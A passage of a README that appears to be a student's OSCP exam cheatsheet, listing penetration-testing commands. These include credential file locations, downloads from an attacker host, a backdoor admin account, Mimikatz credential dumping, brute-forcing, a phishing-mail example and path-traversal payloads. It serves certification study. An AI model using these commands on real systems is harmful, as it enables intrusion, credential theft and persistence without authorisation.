└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # OSCP Cheatsheet 2 | - I prepared this cheatsheet as part of my OSCP preperation. 3 | - I'll keep this updating. 4 | - For any suggestions mail me contact.saisathvik@gmail.com 5 | 6 | # Table of Content 7 | - [General](#general) 8 | - [Important Locations](#important-locations) 9 | - [File Transfers](#file-transfers) 10 | - [Windows to Kali](#windows-to-kali) 11 | - [Adding Users](#adding-users) 12 | - [Windows](#windows) 13 | - [Linux](#linux) 14 | - [Password-Hash Cracking](#password-hash-cracking) 15 | - [fcrackzip](#fcrackzip) 16 | - [John](#john) 17 | - [Hashcat](#hashcat) 18 | - [Mimikatz](#mimikatz) 19 | - [Ligolo-ng](#ligolo-ng) 20 | - [Recon and Enumeration](#recon-and-enumeration) 21 | - [Port Scanning](#port-scanning) 22 | - [FTP enumeration](#ftp-enumeration) 23 | - [SSH enumeration](#ssh-enumeration) 24 | - [SMB enumeration](#smb-enumeration) 25 | - [HTTP/S enumeration](#https-enumeration) 26 | - [Wordpress](#wordpress) 27 | - [Drupal](#drupal) 28 | - [Joomla](#joomla) 29 | - [DNS enumeration](#dns-enumeration) 30 | - [SMTP enumeration](#smtp-enumeration) 31 | - [LDAP Enumeration](#ldap-enumeration) 32 | - [NFS Enumeration](#nfs-enumeration) 33 | - [SNMP Enumeration](#snmp-enumeration) 34 | - [RPC Enumeration](#rpc-enumeration) 35 | - [Web Attacks](#web-attacks) 36 | - [Directory Traversal](#directory-traversal) 37 | - [Local File Inclusion](#local-file-inclusion) 38 | - [SQL Injection](#sql-injection) 39 | - [Exploitation](#exploitation) 40 | - [Reverse Shells](#reverse-shells) 41 | - [Msfvenom](#msfvenom) 42 | - [One Liners](#one-liners) 43 | - [Groovy reverse-shell](#groovy-reverse-shell) 44 | - [Windows Privilege Escalation](#windows-privilege-escalation) 45 | - [Basic](#basic) 46 | - [Automated Scripts](#automated-scripts) 47 | - [Token Impersonation](#token-impersonation) 48 | - [Services](#services) 49 | - [Binary Hijacking](#binary-hijacking) 50 | - [Unquoted Service Path](#unquoted-service-path) 51 | - [Insecure Service Executables](#insecure-service-executables) 52 | - [Weak Registry permissions](#weak-registry-permissions) 53 | - [DLL Hijacking](#dll-hijacking) 54 | - [Autorun](#autorun) 55 | - [AlwaysInstallElevated](#alwaysinstallelevated) 56 | - [Schedules Tasks](#schedules-tasks) 57 | - [Startup Apps](#startup-apps) 58 | - [Insecure GUI apps](#insecure-gui-apps) 59 | - [Passwords](#passwords) 60 | - [Sensitive files](#sensitive-files) 61 | - [Config files](#config-files) 62 | - [Registry](#registry) 63 | - [RunAs - Savedcreds](#runas---savedcreds) 64 | - [Pass the Hash](#pass-the-hash) 65 | - [Linux Privilege Escalation](#linux-privilege-escalation) 66 | - [TTY Shell](#tty-shell) 67 | - [Basic](#basic-1) 68 | - [Automated Scripts](#automated-scripts-1) 69 | - [Sensitive Information](#sensitive-information) 70 | - [Sudo/SUID/Capabilities](#sudosuidcapabilities) 71 | - [Cron Jobs](#cron-jobs) 72 | - [NFS](#nfs) 73 | - [Post Exploitation](#post-exploitation) 74 | - [Sensitive Information](#sensitive-information-1) 75 | - [Powershell History](#powershell-history) 76 | - [Searching for passwords](#searching-for-passwords) 77 | - [Searching in Registry for Passwords](#searching-in-registry-for-passwords) 78 | - [KDBX Files](#kdbx-files) 79 | - [Dumping Hashes](#dumping-hashes) 80 | - [Active Directory Pentesting](#active-directory-pentesting) 81 | - [Enumeration](#enumeration) 82 | - [Powerview](#powerview) 83 | - [Bloodhound](#bloodhound) 84 | - [PsLoggedon](#psloggedon) 85 | - [**Attacking Active Directory Authentication**](#attacking-active-directory-authentication) 86 | - [Password Spraying](#password-spraying) 87 | - [AS-REP Roasting](#as-rep-roasting) 88 | - [Kerberoasting](#kerberoasting) 89 | - [Silver Tickets](#silver-tickets) 90 | - [Secretsdump](#secretsdump) 91 | - [Lateral Movement in Active Directory](#lateral-movement-in-active-directory) 92 | - [psexec - smbexec - wmiexec - atexec](#psexec---smbexec---wmiexec---atexec) 93 | - [winrs](#winrs) 94 | - [crackmapexec](#crackmapexec) 95 | - [Pass the ticket](#pass-the-ticket) 96 | - [Golden Ticket](#golden-ticket) 97 | 98 | 99 | # General 100 | 101 | ## Important Locations 102 | 103 | - Windows 104 | 105 | ```bash 106 | C:/Users/Administrator/NTUser.dat 107 | C:/Documents and Settings/Administrator/NTUser.dat 108 | C:/apache/logs/access.log 109 | C:/apache/logs/error.log 110 | C:/apache/php/php.ini 111 | C:/boot.ini 112 | C:/inetpub/wwwroot/global.asa 113 | C:/MySQL/data/hostname.err 114 | C:/MySQL/data/mysql.err 115 | C:/MySQL/data/mysql.log 116 | C:/MySQL/my.cnf 117 | C:/MySQL/my.ini 118 | C:/php4/php.ini 119 | C:/php5/php.ini 120 | C:/php/php.ini 121 | C:/Program Files/Apache Group/Apache2/conf/httpd.conf 122 | C:/Program Files/Apache Group/Apache/conf/httpd.conf 123 | C:/Program Files/Apache Group/Apache/logs/access.log 124 | C:/Program Files/Apache Group/Apache/logs/error.log 125 | C:/Program Files/FileZilla Server/FileZilla Server.xml 126 | C:/Program Files/MySQL/data/hostname.err 127 | C:/Program Files/MySQL/data/mysql-bin.log 128 | C:/Program Files/MySQL/data/mysql.err 129 | C:/Program Files/MySQL/data/mysql.log 130 | C:/Program Files/MySQL/my.ini 131 | C:/Program Files/MySQL/my.cnf 132 | C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err 133 | C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 134 | C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 135 | C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 136 | C:/Program Files/MySQL/MySQL Server 5.0/my.cnf 137 | C:/Program Files/MySQL/MySQL Server 5.0/my.ini 138 | C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 139 | C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 140 | C:/Program Files (x86)/Apache Group/Apache/conf/access.log 141 | C:/Program Files (x86)/Apache Group/Apache/conf/error.log 142 | C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 143 | C:/Program Files (x86)/xampp/apache/conf/httpd.conf 144 | C:/WINDOWS/php.ini 145 | C:/WINDOWS/Repair/SAM 146 | C:/Windows/repair/system 147 | C:/Windows/repair/software 148 | C:/Windows/repair/security 149 | C:/WINDOWS/System32/drivers/etc/hosts 150 | C:/Windows/win.ini 151 | C:/WINNT/php.ini 152 | C:/WINNT/win.ini 153 | C:/xampp/apache/bin/php.ini 154 | C:/xampp/apache/logs/access.log 155 | C:/xampp/apache/logs/error.log 156 | C:/Windows/Panther/Unattend/Unattended.xml 157 | C:/Windows/Panther/Unattended.xml 158 | C:/Windows/debug/NetSetup.log 159 | C:/Windows/system32/config/AppEvent.Evt 160 | C:/Windows/system32/config/SecEvent.Evt 161 | C:/Windows/system32/config/default.sav 162 | C:/Windows/system32/config/security.sav 163 | C:/Windows/system32/config/software.sav 164 | C:/Windows/system32/config/system.sav 165 | C:/Windows/system32/config/regback/default 166 | C:/Windows/system32/config/regback/sam 167 | C:/Windows/system32/config/regback/security 168 | C:/Windows/system32/config/regback/system 169 | C:/Windows/system32/config/regback/software 170 | C:/Program Files/MySQL/MySQL Server 5.1/my.ini 171 | C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml 172 | C:/Windows/System32/inetsrv/config/applicationHost.config 173 | C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log 174 | ``` 175 | 176 | - Linux 177 | 178 | ```bash 179 | /etc/passwd 180 | /etc/shadow 181 | /etc/aliases 182 | /etc/anacrontab 183 | /etc/apache2/apache2.conf 184 | /etc/apache2/httpd.conf 185 | /etc/apache2/sites-enabled/000-default.conf 186 | /etc/at.allow 187 | /etc/at.deny 188 | /etc/bashrc 189 | /etc/bootptab 190 | /etc/chrootUsers 191 | /etc/chttp.conf 192 | /etc/cron.allow 193 | /etc/cron.deny 194 | /etc/crontab 195 | /etc/cups/cupsd.conf 196 | /etc/exports 197 | /etc/fstab 198 | /etc/ftpaccess 199 | /etc/ftpchroot 200 | /etc/ftphosts 201 | /etc/groups 202 | /etc/grub.conf 203 | /etc/hosts 204 | /etc/hosts.allow 205 | /etc/hosts.deny 206 | /etc/httpd/access.conf 207 | /etc/httpd/conf/httpd.conf 208 | /etc/httpd/httpd.conf 209 | /etc/httpd/logs/access_log 210 | /etc/httpd/logs/access.log 211 | /etc/httpd/logs/error_log 212 | /etc/httpd/logs/error.log 213 | /etc/httpd/php.ini 214 | /etc/httpd/srm.conf 215 | /etc/inetd.conf 216 | /etc/inittab 217 | /etc/issue 218 | /etc/knockd.conf 219 | /etc/lighttpd.conf 220 | /etc/lilo.conf 221 | /etc/logrotate.d/ftp 222 | /etc/logrotate.d/proftpd 223 | /etc/logrotate.d/vsftpd.log 224 | /etc/lsb-release 225 | /etc/motd 226 | /etc/modules.conf 227 | /etc/motd 228 | /etc/mtab 229 | /etc/my.cnf 230 | /etc/my.conf 231 | /etc/mysql/my.cnf 232 | /etc/network/interfaces 233 | /etc/networks 234 | /etc/npasswd 235 | /etc/passwd 236 | /etc/php4.4/fcgi/php.ini 237 | /etc/php4/apache2/php.ini 238 | /etc/php4/apache/php.ini 239 | /etc/php4/cgi/php.ini 240 | /etc/php4/apache2/php.ini 241 | /etc/php5/apache2/php.ini 242 | /etc/php5/apache/php.ini 243 | /etc/php/apache2/php.ini 244 | /etc/php/apache/php.ini 245 | /etc/php/cgi/php.ini 246 | /etc/php.ini 247 | /etc/php/php4/php.ini 248 | /etc/php/php.ini 249 | /etc/printcap 250 | /etc/profile 251 | /etc/proftp.conf 252 | /etc/proftpd/proftpd.conf 253 | /etc/pure-ftpd.conf 254 | /etc/pureftpd.passwd 255 | /etc/pureftpd.pdb 256 | /etc/pure-ftpd/pure-ftpd.conf 257 | /etc/pure-ftpd/pure-ftpd.pdb 258 | /etc/pure-ftpd/putreftpd.pdb 259 | /etc/redhat-release 260 | /etc/resolv.conf 261 | /etc/samba/smb.conf 262 | /etc/snmpd.conf 263 | /etc/ssh/ssh_config 264 | /etc/ssh/sshd_config 265 | /etc/ssh/ssh_host_dsa_key 266 | /etc/ssh/ssh_host_dsa_key.pub 267 | /etc/ssh/ssh_host_key 268 | /etc/ssh/ssh_host_key.pub 269 | /etc/sysconfig/network 270 | /etc/syslog.conf 271 | /etc/termcap 272 | /etc/vhcs2/proftpd/proftpd.conf 273 | /etc/vsftpd.chroot_list 274 | /etc/vsftpd.conf 275 | /etc/vsftpd/vsftpd.conf 276 | /etc/wu-ftpd/ftpaccess 277 | /etc/wu-ftpd/ftphosts 278 | /etc/wu-ftpd/ftpusers 279 | /logs/pure-ftpd.log 280 | /logs/security_debug_log 281 | /logs/security_log 282 | /opt/lampp/etc/httpd.conf 283 | /opt/xampp/etc/php.ini 284 | /proc/cmdline 285 | /proc/cpuinfo 286 | /proc/filesystems 287 | /proc/interrupts 288 | /proc/ioports 289 | /proc/meminfo 290 | /proc/modules 291 | /proc/mounts 292 | /proc/net/arp 293 | /proc/net/tcp 294 | /proc/net/udp 295 | /proc//cmdline 296 | /proc//maps 297 | /proc/sched_debug 298 | /proc/self/cwd/app.py 299 | /proc/self/environ 300 | /proc/self/net/arp 301 | /proc/stat 302 | /proc/swaps 303 | /proc/version 304 | /root/anaconda-ks.cfg 305 | /usr/etc/pure-ftpd.conf 306 | /usr/lib/php.ini 307 | /usr/lib/php/php.ini 308 | /usr/local/apache/conf/modsec.conf 309 | /usr/local/apache/conf/php.ini 310 | /usr/local/apache/log 311 | /usr/local/apache/logs 312 | /usr/local/apache/logs/access_log 313 | /usr/local/apache/logs/access.log 314 | /usr/local/apache/audit_log 315 | /usr/local/apache/error_log 316 | /usr/local/apache/error.log 317 | /usr/local/cpanel/logs 318 | /usr/local/cpanel/logs/access_log 319 | /usr/local/cpanel/logs/error_log 320 | /usr/local/cpanel/logs/license_log 321 | /usr/local/cpanel/logs/login_log 322 | /usr/local/cpanel/logs/stats_log 323 | /usr/local/etc/httpd/logs/access_log 324 | /usr/local/etc/httpd/logs/error_log 325 | /usr/local/etc/php.ini 326 | /usr/local/etc/pure-ftpd.conf 327 | /usr/local/etc/pureftpd.pdb 328 | /usr/local/lib/php.ini 329 | /usr/local/php4/httpd.conf 330 | /usr/local/php4/httpd.conf.php 331 | /usr/local/php4/lib/php.ini 332 | /usr/local/php5/httpd.conf 333 | /usr/local/php5/httpd.conf.php 334 | /usr/local/php5/lib/php.ini 335 | /usr/local/php/httpd.conf 336 | /usr/local/php/httpd.conf.ini 337 | /usr/local/php/lib/php.ini 338 | /usr/local/pureftpd/etc/pure-ftpd.conf 339 | /usr/local/pureftpd/etc/pureftpd.pdn 340 | /usr/local/pureftpd/sbin/pure-config.pl 341 | /usr/local/www/logs/httpd_log 342 | /usr/local/Zend/etc/php.ini 343 | /usr/sbin/pure-config.pl 344 | /var/adm/log/xferlog 345 | /var/apache2/config.inc 346 | /var/apache/logs/access_log 347 | /var/apache/logs/error_log 348 | /var/cpanel/cpanel.config 349 | /var/lib/mysql/my.cnf 350 | /var/lib/mysql/mysql/user.MYD 351 | /var/local/www/conf/php.ini 352 | /var/log/apache2/access_log 353 | /var/log/apache2/access.log 354 | /var/log/apache2/error_log 355 | /var/log/apache2/error.log 356 | /var/log/apache/access_log 357 | /var/log/apache/access.log 358 | /var/log/apache/error_log 359 | /var/log/apache/error.log 360 | /var/log/apache-ssl/access.log 361 | /var/log/apache-ssl/error.log 362 | /var/log/auth.log 363 | /var/log/boot 364 | /var/htmp 365 | /var/log/chttp.log 366 | /var/log/cups/error.log 367 | /var/log/daemon.log 368 | /var/log/debug 369 | /var/log/dmesg 370 | /var/log/dpkg.log 371 | /var/log/exim_mainlog 372 | /var/log/exim/mainlog 373 | /var/log/exim_paniclog 374 | /var/log/exim.paniclog 375 | /var/log/exim_rejectlog 376 | /var/log/exim/rejectlog 377 | /var/log/faillog 378 | /var/log/ftplog 379 | /var/log/ftp-proxy 380 | /var/log/ftp-proxy/ftp-proxy.log 381 | /var/log/httpd-access.log 382 | /var/log/httpd/access_log 383 | /var/log/httpd/access.log 384 | /var/log/httpd/error_log 385 | /var/log/httpd/error.log 386 | /var/log/httpsd/ssl.access_log 387 | /var/log/httpsd/ssl_log 388 | /var/log/kern.log 389 | /var/log/lastlog 390 | /var/log/lighttpd/access.log 391 | /var/log/lighttpd/error.log 392 | /var/log/lighttpd/lighttpd.access.log 393 | /var/log/lighttpd/lighttpd.error.log 394 | /var/log/mail.info 395 | /var/log/mail.log 396 | /var/log/maillog 397 | /var/log/mail.warn 398 | /var/log/message 399 | /var/log/messages 400 | /var/log/mysqlderror.log 401 | /var/log/mysql.log 402 | /var/log/mysql/mysql-bin.log 403 | /var/log/mysql/mysql.log 404 | /var/log/mysql/mysql-slow.log 405 | /var/log/proftpd 406 | /var/log/pureftpd.log 407 | /var/log/pure-ftpd/pure-ftpd.log 408 | /var/log/secure 409 | /var/log/vsftpd.log 410 | /var/log/wtmp 411 | /var/log/xferlog 412 | /var/log/yum.log 413 | /var/mysql.log 414 | /var/run/utmp 415 | /var/spool/cron/crontabs/root 416 | /var/webmin/miniserv.log 417 | /var/www/html/__init__.py 418 | /var/www/html/db_connect.php 419 | /var/www/html/utils.php 420 | /var/www/log/access_log 421 | /var/www/log/error_log 422 | /var/www/logs/access_log 423 | /var/www/logs/error_log 424 | /var/www/logs/access.log 425 | /var/www/logs/error.log 426 | ~/.atfp_history 427 | ~/.bash_history 428 | ~/.bash_logout 429 | ~/.bash_profile 430 | ~/.bashrc 431 | ~/.gtkrc 432 | ~/.login 433 | ~/.logout 434 | ~/.mysql_history 435 | ~/.nano_history 436 | ~/.php_history 437 | ~/.profile 438 | ~/.ssh/authorized_keys 439 | #id_rsa, id_ecdsa, id_ecdsa_sk, id_ed25519, id_ed25519_sk, and id_dsa 440 | ~/.ssh/id_dsa 441 | ~/.ssh/id_dsa.pub 442 | ~/.ssh/id_rsa 443 | ~/.ssh/id_edcsa 444 | ~/.ssh/id_rsa.pub 445 | ~/.ssh/identity 446 | ~/.ssh/identity.pub 447 | ~/.viminfo 448 | ~/.wm_style 449 | ~/.Xdefaults 450 | ~/.xinitrc 451 | ~/.Xresources 452 | ~/.xsession 453 | ``` 454 | 455 | 456 | ## File Transfers 457 | 458 | - Downloading on Windows 459 | 460 | ```bash 461 | powershell -command Invoke-WebRequest -Uri http://:/ -Outfile C:\\temp\\ 462 | iwr -uri http://lhost/file -Outfile file 463 | certutil -urlcache -split -f "http:///" 464 | copy \\kali\share\file . 465 | ``` 466 | 467 | - Downloading on Linux 468 | 469 | ```bash 470 | wget http://lhost/file 471 | curl http:/// > 472 | ``` 473 | 474 | ### Windows to Kali 475 | 476 | ```bash 477 | kali> impacket-smbserver -smb2support . 478 | win> copy file \\KaliIP\sharename 479 | ``` 480 | 481 | ## Adding Users 482 | 483 | ### Windows 484 | 485 | ```powershell 486 | net user hacker hacker123 /add 487 | net localgroup Administrators hacker /add 488 | net localgroup "Remote Desktop Users" hacker /ADD 489 | ``` 490 | 491 | ### Linux 492 | 493 | ```bash 494 | adduser #Interactive 495 | useradd 496 | 497 | useradd -u -g #UID can be something new than existing, this command is to add a user to a specific group 498 | ``` 499 | 500 | ## Password-Hash Cracking 501 | 502 | *Hash Analyzer*: [https://www.tunnelsup.com/hash-analyzer/](https://www.tunnelsup.com/hash-analyzer/) 503 | 504 | ### fcrackzip 505 | 506 | ```bash 507 | fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt .zip #Cracking zip files 508 | ``` 509 | 510 | ### John 511 | 512 | > [https://github.com/openwall/john/tree/bleeding-jumbo/run](https://github.com/openwall/john/tree/bleeding-jumbo/run) 513 | > 514 | 515 | ```bash 516 | ssh2john.py id_rsa > hash 517 | #Convert the obtained hash to John format(above link) 518 | john hashfile --wordlist=rockyou.txt 519 | ``` 520 | 521 | ### Hashcat 522 | 523 | > [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) 524 | > 525 | 526 | ```bash 527 | #Obtain the Hash module number 528 | hashcat -m hash wordlists.txt --force 529 | ``` 530 | 531 | ## Mimikatz 532 | 533 | ```powershell 534 | privilege::debug 535 | sekurlsa::logonpasswords #hashes and plaintext passwords 536 | lsadump::sam 537 | lsadump::lsa /patch #both these dump SAM 538 | 539 | #OneLiner 540 | .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" 541 | 542 | ``` 543 | 544 | ## Ligolo-ng 545 | 546 | ```bash 547 | #Creating interface and starting it. 548 | sudo ip tuntap add user $(whoami) mode tun ligolo 549 | sudo ip link set ligolo up 550 | 551 | #Kali machine - Attacker machine 552 | ./proxy -laddr :9001 -selfcert 553 | 554 | #windows or linux machine - compromised machine 555 | ./agent -connect :9001 -ignore-cert 556 | 557 | #In Ligolo-ng console 558 | session #select host 559 | ifconfig #Notedown the internal network's subnet 560 | start #after adding relevent subnet to ligolo interface 561 | 562 | #Adding subnet to ligolo interface - Kali linux 563 | sudo ip r add dev ligolo 564 | 565 | ``` 566 | 567 | --- 568 | 569 | # Recon and Enumeration 570 | 571 | - OSINT OR Passive Recon 572 | 573 | 577 | 578 | - whois: `whois ` or `whois -h ` 579 | - Google dorking, 580 | - site 581 | - filetype 582 | - intitle 583 | - GHDB - Google hacking database 584 | - OS and Service Information using [searchdns.netcraft.com](https://searchdns.netcraft.com) 585 | - Github dorking 586 | - filename 587 | - user 588 | - A tool called Gitleaks for automated enumeration 589 | - Shodan dorks 590 | - hostname 591 | - port 592 | - Then gather infor by going through the options 593 | - Scanning Security headers and SSL/TLS using [https://securityheaders.com/](https://securityheaders.com/) 594 | 595 | 596 | ## Port Scanning 597 | 598 | ```bash 599 | #use -Pn option if you're getting nothing in scan 600 | nmap -sC -sV -v #Basic scan 601 | nmap -T4 -A -p- -v #complete scan 602 | sudo nmap -sV -p 443 --script "vuln" 192.168.50.124 #running vuln category scripts 603 | 604 | #NSE 605 | updatedb 606 | locate .nse | grep 607 | sudo nmap --script="name" #here we can specify other options like specific ports...etc 608 | 609 | Test-NetConnection -Port #powershell utility 610 | 611 | 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null #automating port scan of first 1024 ports in powershell 612 | ``` 613 | 614 | ## FTP enumeration 615 | 616 | ```bash 617 | ftp 618 | #login if you have relevant creds or based on nmpa scan find out whether this has anonymous login or not, then loginwith Anonymous:password 619 | 620 | put #uploading file 621 | get #downloading file 622 | 623 | #NSE 624 | locate .nse | grep ftp 625 | nmap -p21 --script= 626 | 627 | #bruteforce 628 | hydra -L users.txt -P passwords.txt ftp #'-L' for usernames list, '-l' for username and viceversa 629 | 630 | #check for vulnerabilities associated with the version identified. 631 | ``` 632 | 633 | ## SSH enumeration 634 | 635 | ```bash 636 | #Login 637 | ssh uname@IP #enter password in the prompt 638 | 639 | #id_rsa or id_ecdsa file 640 | chmod 600 id_rsa/id_ecdsa 641 | ssh uname@IP -i id_rsa/id_ecdsa #if it still asks for password, crack them using John 642 | 643 | #cracking id_rsa or id_ecdsa 644 | ssh2john id_ecdsa(or)id_rsa > hash 645 | john --wordlist=/home/sathvik/Wordlists/rockyou.txt hash 646 | 647 | #bruteforce 648 | hydra -l uname -P passwords.txt ssh #'-L' for usernames list, '-l' for username and viceversa 649 | 650 | #check for vulnerabilities associated with the version identified. 651 | ``` 652 | 653 | ## SMB enumeration 654 | 655 | ```bash 656 | sudo nbtscan -r 192.168.50.0/24 #IP or range can be provided 657 | 658 | #NSE scripts can be used 659 | locate .nse | grep smb 660 | nmap -p445 --script="name" $IP 661 | 662 | #In windows we can view like this 663 | net view \\ /all 664 | 665 | #crackmapexec 666 | crackmapexec smb 667 | crackmapexec smb 192.168.1.100 -u username -p password 668 | crackmapexec smb 192.168.1.100 -u username -p password --shares #lists available shares 669 | crackmapexec smb 192.168.1.100 -u username -p password --users #lists users 670 | crackmapexec smb 192.168.1.100 -u username -p password --all #all information 671 | crackmapexec smb 192.168.1.100 -u username -p password -p 445 --shares #specific port 672 | crackmapexec smb 192.168.1.100 -u username -p password -d mydomain --shares #specific domain 673 | #Inplace of username and password, we can include usernames.txt and passwords.txt for password-spraying or bruteforcing. 674 | 675 | # Smbclient 676 | smbclient -L //IP #or try with 4 /'s 677 | smbclient //server/share 678 | smbclient //server/share -U 679 | mbclient //server/share -U domain/username 680 | 681 | #SMBmap 682 | smbmap -H 683 | smbmap -H -u -p 684 | smbmap -H -u -p -d 685 | smbmap -H -u -p -r 686 | 687 | #Within SMB session 688 | put #to upload file 689 | get #to download file 690 | ``` 691 | 692 | - Downloading shares made easy - if the folder consists of several files, they all be downloading by this. 693 | 694 | ```bash 695 | mask "" 696 | recurse ON 697 | prompt OFF 698 | mget * 699 | ``` 700 | 701 | ## HTTP/S enumeration 702 | 703 | - View source-code and identify any hidden content. If some image looks suspicious download and try to find hidden data in it. 704 | - Identify the version or CMS and check for active exploits. This can be done using Nmap and Wappalyzer. 705 | - check /robots.txt folder 706 | - Look for the hostname and add the relevant one to `/etc/hosts` file. 707 | - Directory and file discovery - Obtain any hidden files which may contain juicy information 708 | 709 | ```bash 710 | dirbuster 711 | gobuster dir -u http://example.com -w /path/to/wordlist.txt 712 | python3 dirsearch.py -u http://example.com -w /path/to/wordlist.txt 713 | ``` 714 | 715 | - Vulnerability Scanning using nikto: `nikto -h ` 716 | - SSL certificate inspection, this may reveal information like subdomains, usernames…etc 717 | - Default credentials, Identify the CMS or service ans check for default credentials and test them out. 718 | - Bruteforce 719 | 720 | ```bash 721 | hydra -L users.txt -P password.txt http-{post/get}-form "/path:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V 722 | # Use https-post-form mode for https, post or get can be obtained from Burpsuite. Also do capture the response for detailed info. 723 | 724 | #Bruteforce can also be done by Burpsuite but it's slow, prefer Hydra! 725 | ``` 726 | 727 | - if `cgi-bin` is present then do further fuzzing and obtain files like .sh or .pl 728 | - Check if other services like FTP/SMB or anyothers which has upload privileges are getting reflected on web. 729 | - API - Fuzz further and it can reveal some sensitive information 730 | 731 | ```bash 732 | #identifying endpoints using gobuster 733 | gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern #pattern can be like {GOBUSTER}/v1 here v1 is just for example, it can be anything 734 | 735 | #obtaining info using curl 736 | curl -i http://192.168.50.16:5002/users/v1 737 | ``` 738 | 739 | - If there is any Input field check for **Remote Code execution** or **SQL Injection** 740 | - Check the URL, whether we can leverage **Local or Remote File Inclusion**. 741 | - Also check if there’s any file upload utility(also obtain the location it’s getting reflected) 742 | 743 | ### Wordpress 744 | 745 | ```bash 746 | # basic usage 747 | wpscan --url "target" --verbose 748 | 749 | # enumerate vulnerable plugins, users, vulrenable themes, timthumbs 750 | wpscan --url "target" --enumerate vp,u,vt,tt --follow-redirection --verbose --log target.log 751 | 752 | # Add Wpscan API to get the details of vulnerabilties. 753 | ``` 754 | 755 | ### Drupal 756 | 757 | ```bash 758 | droopescan scan drupal -u http://site 759 | ``` 760 | 761 | ### Joomla 762 | 763 | ```bash 764 | droopescan scan joomla --url http://site 765 | sudo python3 joomla-brute.py -u http://site/ -w passwords.txt -usr username #https://github.com/ajnik/joomla-bruteforce 766 | ``` 767 | 768 | ## DNS enumeration 769 | 770 | ```bash 771 | host www.megacorpone.com 772 | host -t mx megacorpone.com 773 | host -t txt megacorpone.com 774 | 775 | for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" #bash bruteforcer to find domain name 776 | 777 | dnsrecon -d megacorpone.com -t std #standard recon 778 | dnsrecon -d megacorpone.com -D ~/list.txt -t brt #bruteforce, hence we provided list 779 | 780 | dnsenum megacorpone.com 781 | 782 | nslookup mail.megacorptwo.com 783 | nslookup -type=TXT info.megacorptwo.com 192.168.50.151 #we're querying with a specific IP 784 | ``` 785 | 786 | ## SMTP enumeration 787 | 788 | ```bash 789 | nc -nv 25 #Version Detection 790 | smtp-user-enum -M VRFY -U username.txt -t # -M means mode, it can be RCPT, VRFY, EXPN 791 | 792 | #Sending email with valid credentials, the below is an example for Phishing mail attack 793 | sudo swaks -t user1@test.com -t user2@test.com --from user3@test.com --server --body @body.txt --header "Test" --suppress-data -ap 794 | ``` 795 | 796 | ## LDAP Enumeration 797 | 798 | ```bash 799 | ldapsearch -x -H ldap:// -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=" 800 | ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" 801 | #CN name describes the info w're collecting 802 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=" 803 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=" 804 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" 805 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=" 806 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" 807 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" 808 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" 809 | 810 | #windapsearch.py 811 | #for computers 812 | python3 windapsearch.py --dc-ip -u -p --computers 813 | 814 | #for groups 815 | python3 windapsearch.py --dc-ip -u -p --groups 816 | 817 | #for users 818 | python3 windapsearch.py --dc-ip -u -p --da 819 | 820 | #for privileged users 821 | python3 windapsearch.py --dc-ip -u -p --privileged-users 822 | ``` 823 | 824 | ## NFS Enumeration 825 | 826 | ```bash 827 | nmap -sV --script=nfs-showmount 828 | showmount -e 829 | ``` 830 | 831 | ## SNMP Enumeration 832 | 833 | ```bash 834 | snmpcheck -t -c public 835 | snmpwalk -c public -v1 -t 10 836 | snmpenum -t 837 | ``` 838 | 839 | ## RPC Enumeration 840 | 841 | ```bash 842 | rpcclient -U=user $DCIP 843 | rpcclient -U="" $DCIP #Anonymous login 844 | ##Commands within in RPCclient 845 | srvinfo 846 | enumdomusers #users 847 | enumpriv #like "whoami /priv" 848 | queryuser #detailed user info 849 | getuserdompwinfo #password policy, get user-RID from previous command 850 | lookupnames #SID of specified user 851 | createdomuser #Creating a user 852 | deletedomuser 853 | enumdomains 854 | enumdomgroups 855 | querygroup #get rid from previous command 856 | querydispinfo #description of all users 857 | netshareenum #Share enumeration, this only comesup if the current user we're logged in has permissions 858 | netshareenumall 859 | lsaenumsid #SID of all users 860 | ``` 861 | 862 | --- 863 | 864 | # Web Attacks 865 | 866 | 869 | 870 | ## Directory Traversal 871 | 872 | ```bash 873 | cat /etc/passwd #displaying content through absolute path 874 | cat ../../../etc/passwd #relative path 875 | 876 | # if the pwd is /var/log/ then in order to view the /etc/passwd it will be like this 877 | cat ../../etc/passwd 878 | 879 | #In web int should be exploited like this, find a parameters and test it out 880 | http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd 881 | #check for id_rsa, id_ecdsa 882 | #If the output is not getting formatted properly then, 883 | curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd 884 | 885 | #For windows 886 | http://192.168.221.193:3000/public/plugins/alertlist/../../../../../../../../Users/install.txt #no need to provide drive 887 | ``` 888 | 889 | - URL Encoding 890 | 891 | 